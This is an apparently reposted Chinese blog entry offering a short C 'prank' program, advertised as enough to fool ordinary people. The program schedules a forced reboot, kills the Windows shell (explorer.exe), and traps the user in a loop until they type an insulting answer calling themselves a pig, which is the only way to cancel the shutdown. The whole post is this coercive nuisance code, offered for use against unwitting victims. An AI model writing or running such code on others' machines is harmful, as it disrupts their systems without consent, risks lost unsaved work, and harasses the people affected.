自写的一个整人小程序, 方法简单,代码简短(骗一骗一般人足够了)。
Posted quanchang
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了自写的一个整人小程序, 方法简单,代码简短(骗一骗一般人足够了)。相关的知识,希望对你有一定的参考价值。
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
main()
{
char a[12],b[12]={"shi"};
system("shutdown -r -t 90");
system("taskkill/im explorer.exe /f");
system("cls");
v: printf("你是猪(打拼音)?\n");
scanf("%s",a);
if(strcmp(a,b)==0)
{
system("shutdown -a");
system("explorer.exe");
}
else goto v;
}
以上是关于自写的一个整人小程序, 方法简单,代码简短(骗一骗一般人足够了)。的主要内容,如果未能解决你的问题,请参考以下文章